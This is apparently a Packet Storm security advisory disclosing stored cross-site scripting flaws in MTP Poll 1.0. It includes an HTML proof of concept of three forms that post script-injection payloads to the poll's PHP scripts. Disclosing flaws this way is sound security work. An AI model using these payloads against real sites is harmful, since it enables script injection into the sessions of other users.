MTP Poll 1.0 Cross Site Scripting

Type packetstorm
Reporter LiquidWorm
Modified 2013-02-25T00:00:00


MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities  
Vendor: MTP Scripts  
Product web page:  
Affected version: 1.0  
Summary: More than poll is a polling system with a powerful  
administration tool. It features: multiple pools, templates,  
unlimited options, IP Logging, cookie support, and more.  
Desc: MTP Poll script suffers from multiple stored cross-site scripting  
vulnerabilities. The issues are triggered when input passed via several  
parameters to several scripts is not properly sanitized before being returned  
to the user. This can be exploited to execute arbitrary HTML and script code  
in a user's browser session in context of an affected site.  
Tested on: Linux, Apache2  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2013-5132  
Advisory URL:  
<title>MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities</title>  
<form method="POST" action="http://localhost/poll_script/poll_add.php">  
<input type="hidden" name="question" value='"><script>alert(1);</script>' />  
<input type="hidden" name="color[]" value="#8bc6e1" />  
<input type="hidden" name="answer[]" value='"><script>alert(2);</script>' />  
<input type="hidden" name="img[]" value="" />  
<input type="hidden" name="status" value="1" />  
<input type="hidden" name="cat" value="0" />  
<input type="hidden" name="action" value="add" />  
<input type="submit" value="XSS #1" />  
<br /><br />  
<form method="POST" action="http://localhost/poll_script/insert_user.php">  
<input type="hidden" name="ins_city" value='"><script>alert(3);</script>' />  
<input type="hidden" name="ins_country" value="MK" />  
<input type="hidden" name="ins_email" value="" />  
<input type="hidden" name="ins_fname" value='"><script>alert(4);</script>' />  
<input type="hidden" name="ins_pass" value="thricerpass" />  
<input type="hidden" name="ins_username" value="thricer" />  
<input type="submit" value="XSS #2" />  
<br /><br />  
<form method="POST" action="http://localhost/poll_script/ajax_cat_ins.php">  
<input type="hidden" name="name" value='"><script>alert(5);</script>' />  
<input type="submit" value="XSS #3" />